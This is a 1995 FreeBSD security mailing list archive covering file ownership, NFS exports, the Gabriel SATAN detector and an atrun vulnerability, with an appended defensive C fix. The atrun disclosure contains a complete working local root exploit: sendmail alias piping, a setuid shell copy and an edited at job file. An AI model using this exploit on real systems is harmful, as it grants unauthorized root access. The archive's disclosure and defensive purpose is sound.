From owner-freebsd-security Sun Apr 2 09:19:49 1995
From: roberto@blaise.ibp.fr (Ollivier Robert)
Message-Id: <9504021619.AA25615@blaise.ibp.fr>
Subject: Re: root owning everything
To: pst@Shockwave.COM (Paul Traina)
Date: Sun, 2 Apr 1995 18:19:28 +0200 (MET DST)
Cc: security@FreeBSD.org
In-Reply-To: <199504011850.KAA15088@precipice.shockwave.com> from "Paul Traina" at Apr 1, 95 10:50:37 am

> Except for setuid files, the majority of files in / and /usr should be owned
> by root, not bin, so that I can't nfsmount a volume read-write and su to
> bin and have a party.

My feelings too for a long time. Every directory on my machine is owned by root for the same reason.

--
Ollivier ROBERT -=- The daemon is FREE!
-=- roberto@FreeBSD.ORG
FreeBSD keltia 2.1.0-Development #7: Thu Mar 23 00:28:31 MET 1995

From owner-freebsd-security Sun Apr 2 13:30:15 1995
Date: Sun, 2 Apr 1995 16:29:42 -0400
From: Garrett Wollman
Message-Id: <9504022029.AA21539@halloran-eldar.lcs.mit.edu>
To: Paul Traina
Cc: security@FreeBSD.org
Subject: root owning everything
In-Reply-To: <199504011850.KAA15088@precipice.shockwave.com>
References: <199504011850.KAA15088@precipice.shockwave.com>

< said:

> Except for setuid files, the majority of files in / and /usr should be owned
> by root, not bin, so that I can't nfsmount a volume read-write and su to
> bin and have a party.
> An alternative would be to map uid bin to nobody the same way root is done.

If you care about security, you'll map almost everybody to nobody in /etc/exports. I'm not sure if this works right now.

-GAWollman

--
Garrett A. Wollman   | Shashish is simple, it's discreet, it's brief. ...
wollman@lcs.mit.edu  | Shashish is the bonding of hearts in spite of distance.
Opinions not those of| It is a bond more powerful than absence. We like people
MIT, LCS, ANA, or NSA| who like Shashish.
- Claude McKenzie + Florent Vollant

From owner-freebsd-security Mon Apr 3 16:08:45 1995
From: "Brian Sletten"
Message-Id: <9504031842.ZM18419@jester.autometric.com>
Date: Mon, 3 Apr 1995 18:42:08 -0400
Reply-To: bsletten@vivid.autometric.com
Resent-From: "Jordan K. Hubbard"

I remember some discussion not too long ago about the securedist features and international users. I was just told by someone that Phil Zimmerman was indicted today on exporting munitions charges. You might want to make sure that similar issues are not involved with providing the securedist via ftp from freefall....

Just thought I'd let you know.

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Brian J. Sletten         2905 Wickersham Way, #202   (703) 658-4178 (O)
bsletten@autometric.com  Falls Church, VA 22042      (703) 207-9377 (H)

The opposite of a profound truth may well be another profound truth. ##Bohr
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From owner-freebsd-security Tue Apr 4 06:27:58 1995
From: adam
Message-Id: <199504041320.QAA09588@lune.math.tau.ac.il>
Subject: atrun hole
To: freebsd-security@FreeBSD.org
Date: Tue, 4 Apr 1995 16:20:44 +0300 (GMT+0300)

There are some security problems in the FreeBSD atrun(8) system, one of which allows root access to be obtained easily.

First, before running a job, atrun takes an 8 character string from the at job file, assumes it is the login of someone to mail, and passes it to sendmail without any checks. The code says that atrun is run setuid root, and therefore it tries to remain secure by using a scheme which revokes privileges based on changing the real and effective uids of the process. Note, *uids*.
However, since (both according to the man page, and the way FreeBSD comes set up) atrun is not setuid root, but executed from /etc/crontab -- it is really run by the root uid. This means that no matter what atrun does, it executes sendmail as root, and there's the hole, which allows root to be broken. An exploit for this problem is included below.

The second problem is that atrun only calls setgid() and setuid() to reduce privileges, and doesn't call initgroups(). This leaves jobs run by atrun being in every group root is in.

The author of the program, Thomas Koenig, has released a better version of the system, at-2.7a, for Linux. It fixes all of these problems. Therefore, as an immediate fix, I suggest obtaining and installing that version, though I'm unsure of how smoothly it will go, considering it's a Linux program.

ftp://sunsite.unc.edu/pub/Linux/system/Daemons/at-2.7a.tgz

He writes --

``If it's ok by the FreeBSD people, I'll put out version 2.8 (which checks for the presence of a '-' in the name to be mailed to, and then doesn't invoke the mailer) up with a BSD copyright again, but that'll take a bit of time.''

And, later --

Subject: Re: atrun hole
To: adam@math.tau.ac.il (adam)
Date: Tue, 4 Apr 1995 01:20:36 +0200 (MET DST)
In-Reply-To: <199503311834.UAA29332@lune.math.tau.ac.il> from "adam" at Mar 31, 95 08:34:34 pm
From: Thomas.Koenig@ciw.uni-karlsruhe.de (Thomas Koenig)

An additional thought...

If there's any problem because of the GPL copyright on at 2.7a, I, with this mail, give the *BSD maintainers permission to put it under the same BSD-style license which I've slapped on 2.5 or whatever old version it was I sent them.

Please feel free to forward this as appropriate.

Thomas Koenig

===

The following works provided the at jobs directory (/var/at/jobs) is accessible to users. It is with FreeBSD. It is set to mode 0700 with at-2.7a.
5:53pm [eden:~] % whoami
adam
5:53pm [eden:~] % cd /tmp
5:53pm [eden:/tmp] % sed -e 's/Og1/Og0/' -e 's/Ou1/Ou0/' -e 's/etc\/aliases/tmp\/aliases/' /etc/sendmail.cf > c
5:54pm [eden:/tmp] % cat > aliases
postmaster: "|/tmp/rootme"
root: "|/tmp/rootme"
adam: "|/tmp/rootme"
^D
5:55pm [eden:/tmp] % /usr/sbin/sendmail -bi -oA/tmp/aliases -oQ/tmp
/tmp/aliases: 3 aliases, longest 14 bytes, 60 bytes total
5:55pm [eden:/tmp] % cat > rootme
#!/bin/sh
/bin/cp /bin/sh /tmp/sh
/bin/chmod 6777 /tmp/sh
^D
5:55pm [eden:/tmp] % chmod 755 rootme
5:56pm [eden:/tmp] % at now + 1 min
fooz
^D
Job a00ca9a79.000 will be executed using /bin/sh
5:56pm [eden:/tmp] % joe /var/at/jobs/a00ca9a79.000
5:56pm [eden:/tmp] % cat /var/at/jobs/a00ca9a79.000
#! /bin/sh
# mail -C/tmp/c 1
umask 22
HOME=\/home\/adam; export HOME
SHELL=\/usr\/local\/bin\/tcsh; export SHELL
LOGNAME=adam; export LOGNAME
USER=adam; export USER
PATH=\/home\/adam\/bin\:\/bin\:\/sbin\:\/usr\/bin\:\/usr\/sbin\:\/usr\/local\:\/usr\/local\/bin; export PATH
HOSTTYPE=FreeBSD; export HOSTTYPE
VENDOR=intel; export VENDOR
OSTYPE=FreeBSD; export OSTYPE
MACHTYPE=i386; export MACHTYPE
SHLVL=1; export SHLVL
PWD=\/tmp; export PWD
HOST=eden; export HOST
PAGER=less; export PAGER
VISUAL=joe; export VISUAL
MANPATH=\/usr\/share\/man\:\/usr\/local\/man\:\/usr\/man\:\/home\/adam\/man; export MANPATH
cd /tmp
fooz
5:56pm [eden:/tmp] % sleep 240
DING! [eden:/tmp] % /tmp/sh
# whoami
root

From owner-freebsd-security Tue Apr 4 06:29:08 1995
Message-Id: <199504041328.PAA03260@mvmampc66.ciw.uni-karlsruhe.de>
Subject: security hole in old versions of at for Linux (fwd)
To: freebsd-security@FreeBSD.org
Date: Tue, 4 Apr 1995 15:28:14 +0200 (MET DST)
From: Thomas.Koenig@ciw.uni-karlsruhe.de (Thomas Koenig)

I sent out the following message yesterday to the linux-security list.

The bug I described (for which I also got a full exploitation script, which I'm not releasing at present) appears to be in the current FreeBSD distributions. It would appear that this is the (older) version of at/atrun, version 2.5 or thereabouts, which I released under a BSD-style copyright specifically for inclusion in FreeBSD.

Since 2.7a has this bug fixed, it would be advisable to upgrade ASAP. For the record, I give the FreeBSD maintainers explicit permission to slap the same copyright I released their current version under on 2.7a. It can be found in the usual Linux places, such as sunsite.unc.edu.
[Please CC: me any reply; I don't subscribe to any FreeBSD list]

Thomas

> I've just been informed that earlier versions of my at/atrun package
> for Linux had a bug which allowed root access for any authorized user
> of the system.
>
> This bug can only be exploited if the user can edit a job he's
> submitted to the atrun queue.
>
> If 'at -V' shows a version earlier than 2.7, or if the directory
> /var/spool/atjobs (or, possibly, /usr/spool/atjobs) is world-executable,
> you are vulnerable.
>
> In that case, upgrade your system to at 2.7 or 2.7a immediately.
>
> In the meantime, changing the permissions of /var/spool/atjobs to 700
> will prevent unauthorized root access; this may also render the
> 'at' system unusable.
>
> Non-vulnerable versions of at have been around for about 10
> months, and have been included in the standard distributions.

From owner-freebsd-security Thu Apr 6 08:17:56 1995
To: security@FreeBSD.org
References: <199504041320.QAA09588@lune.math.tau.ac.il>
In-Reply-To: <199504041320.QAA09588@lune.math.tau.ac.il>; from adam at Tue, 4 Apr 1995 16:20:44 +0300 (GMT+0300)
Organization: Olahm Ha-Yetzirah
Date: Thu, 6 Apr 1995 19:04:53 +0400
From: "Andrey A. Chernov, Black Mage"
Subject: Re: atrun hole

Has anybody already picked up this work?

--
Andrey A. Chernov        : And I rest so composedly, /Now, in my bed,
ache@astral.msk.su       : That any beholder /Might fancy me dead -
FidoNet: 2:5020/230.3    : Might start at beholding me, /Thinking me dead.
RELCOM Team,FreeBSD Team : E.A.Poe From "For Annie" 1849

From owner-freebsd-security Thu Apr 6 18:03:17 1995
Date: Fri, 7 Apr 1995 04:47:00 +0400
Message-Id: <199504070047.AA27453@newcom.kiae.su>
To: security@FreeBSD.org
Subject: Announcing GABRIEL - Free SATAN Detector
From: "Andrey A. Chernov, Black Mage"
Organization: Olahm Ha-Yetzirah

>Newsgroups: comp.security.unix
>From: lat@lat.com (Los Altos Technologies)
>Subject: Announcing GABRIEL - Free SATAN Detector
>Keywords: SATAN, Gabriel
>Organization: Los Altos Technologies, Inc.
>Date: Thu, 6 Apr 1995 07:07:49 GMT
>Lines: 115

Los Altos Technologies, Inc. has released Gabriel, a free SATAN detector. Gabriel gives the system administrator an early warning of a possible network intrusion by detecting and identifying unauthorized network probing. Gabriel is complete and ready to run software that does not require Perl or any other public domain programs.

Gabriel's highlights:

    Ready to run for Sun Solaris1 and Solaris2 operating systems.
    Full source included. Perl IS NOT required.
    Test script included to simplify evaluation of Gabriel.
    Built-in mechanism to send real-time alerts via pager, phone call, email, or online displays.

Gabriel comes with:

    gabriel_client - Reports to gabriel_server excessive probing of any host on its network segment.
    gabriel_server - Gathers data from clients and notifies administrator via email, pager, etc.
    install_gabriel_clients - Single script to install and start client monitor programs network-wide.
    install_gabriel_server - Installs the server program.

    Via the World Wide Web:
        http://www.lat.com
        ftp://ftp.best.com/pub/lat

    Via FTP:
        ftp.lat.com

To join the Gabriel mailing list: Send mail to "Majordomo@lat.com" with the command "subscribe gabriel" in the body of the email message.

WHAT IS GABRIEL?

As a public service, Los Altos Technologies, Inc., a provider of Unix security software, has developed and released a free SATAN detector called Gabriel(tm). Gabriel gives the system administrator an early warning of possible network intrusions by detecting and identifying SATAN's network probing. Gabriel is a complete and ready to run package that DOES NOT require Perl or any other software or libraries.

HOW MUCH DOES IT COST?

We are providing Gabriel at no charge to our customers or anyone else who wishes to use it, subject to the terms explained in the COPYRIGHT file.

WHY DID LOS ALTOS TECHNOLOGIES CREATE GABRIEL?
We are deeply concerned with network security and the possible negative effects of SATAN and other network probing software. By combining SATAN with Gabriel, a system administrator can get all the benefits of running authorized SATAN scans without the risks of unauthorized and undetected network probing.

HOW IS IT SUPPORTED? HOW DO I JOIN THE MAILING LIST?

It is expected that future updates, enhancements and revisions will come from the users' group. To subscribe to the users' group mailing list, send a message to "majordomo@lat.com" with any subject line, and inside the body of the message include the line "subscribe gabriel".

WHERE IS THE LATEST VERSION?

You can get the latest version via World Wide Web or ftp.

    http://www.lat.com
    ftp://ftp.best.com/pub/lat

HOW DO I MAKE GABRIEL FROM SOURCE CODE?

Gabriel includes pre-compiled binaries for Solaris 1.x and Solaris 2.x, so you do not need to build it from source. If you wish to compile it execute "make all" and follow the directions.

HOW DO I INSTALL AND EVALUATE GABRIEL?

Follow the directions in the manual page, gabriel.8. You can print this file using "troff -man -t gabriel.8 | lpr -t", or just look at gabriel.txt. Basically, you just run the server install script, and then the client install script.

======================================================================
Los Altos Technologies, Inc.
2111 Grant Rd, Los Altos, CA 94024
Phone: 415/988-4848
Fax: 415/988-4860
Email: info@lat.com

From owner-freebsd-security Sat Apr 8 09:55:36 1995
From: Mark Hittinger
Message-Id: <199504081658.MAA29650@ns1.win.net>
Subject: satan "heavy" mode attacks
To: freebsd-security@FreeBSD.org
Date: Sat, 8 Apr 1995 12:58:56 -0400 (EDT)

I've just read that some sites are reporting that using satan in its "heavy" mode will overload an inetd and make it toss its cookies.

There are reports that the activity also causes some firewall products to consume available memory and discontinue logging some things.

We probably need to double check our inetd and make sure it can deal with the resource overload issue.
Regards,

Mark Hittinger
bugs@win.net

From owner-freebsd-security Sat Apr 8 15:41:45 1995
From: John Capo
Message-Id: <199504082241.SAA00738@irbs.com>
Subject: Re: satan "heavy" mode attacks
To: freebsd-security@FreeBSD.org
Date: Sat, 8 Apr 1995 18:41:39 -0400 (EDT)
In-Reply-To: <199504081658.MAA29650@ns1.win.net> from "Mark Hittinger" at Apr 8, 95 12:58:56 pm

Mark Hittinger writes:
>
>
> I've just read that some sites are reporting that using satan in its "heavy"
> mode will overload an inetd and make it toss its cookies.
>
> There are reports that the activity also causes some firewall products to
> consume available memory and discontinue logging some things.
>
> We probably need to double check our inetd and make sure it can deal with
> the resource overload issue.
>

I have run the "heavy" Satan against four -current systems and three 1.1.5.1 systems and they survived just fine. YMMV :-)

John Capo
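
Referring back to the "atrun hole" report earlier in this archive, the following is an added example (not part of any message here and not taken from the at/atrun sources) of the two checks that report calls for: validating the 8-character mail name before a mailer is run, and dropping privileges with initgroups() before setgid() and setuid(). The function names are hypothetical, the header layout is assumed from the job file shown in the report, and the character whitelist is an assumption that is stricter than the '-' check described for version 2.8.

```c
#define _DEFAULT_SOURCE          /* exposes initgroups() on glibc */
#include <ctype.h>
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define MAILNAME_MAX 8           /* the report says atrun reads 8 characters */

/* A mail recipient must look like a plain login name: it may not start with
 * '-' (the mailer would read it as an option) and may not contain '/'. */
int mailname_ok(const char *name)
{
    size_t n = strlen(name);
    if (n == 0 || n > MAILNAME_MAX) return 0;
    if (!isalnum((unsigned char)name[0]) && name[0] != '_') return 0;
    for (size_t i = 1; i < n; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '_' && c != '.' && c != '-') return 0;
    }
    return 1;
}

/* Parse "#! /bin/sh\n# mail <name> <flag>" (layout assumed from the job file
 * shown in the report). Returns 1 only for a well-formed header with a safe
 * name; on 0 the caller should not invoke the mailer for this job. */
int parse_job_header(const char *job, char name[MAILNAME_MAX + 1], int *flag)
{
    char buf[MAILNAME_MAX + 2];  /* one extra char so overlong names are seen */
    if (sscanf(job, "#! /bin/sh\n# mail %9s %d", buf, flag) != 2) return 0;
    if (!mailname_ok(buf)) return 0;
    strcpy(name, buf);
    return 1;
}

/* Drop root for good before running a job: supplementary groups first, then
 * gid, then uid. Returns 0 on success; on -1 the job must not be run. */
int drop_to_user(const struct passwd *pw)
{
    if (initgroups(pw->pw_name, pw->pw_gid) != 0) return -1;
    if (setgid(pw->pw_gid) != 0) return -1;
    if (setuid(pw->pw_uid) != 0) return -1;
    if (pw->pw_uid != 0 && setuid(0) == 0) return -1;  /* must not regain root */
    return 0;
}

int main(void)
{
    /* Constructed sample headers; the second mirrors the edited job file. */
    const char *jobs[] = { "#! /bin/sh\n# mail adam 1\numask 22\n",
                           "#! /bin/sh\n# mail -C/tmp/c 1\numask 22\n" };
    for (int i = 0; i < 2; i++) {
        char name[MAILNAME_MAX + 1];
        int flag;
        if (parse_job_header(jobs[i], name, &flag))
            printf("job %d: mail %s (flag %d)\n", i, name, flag);
        else
            printf("job %d: header rejected, no mailer invoked\n", i);
    }
    return 0;
}
```

drop_to_user() is meant to be called in the child process, as root, with the passwd entry of the job's owner; it is not exercised by main() because it needs root to succeed.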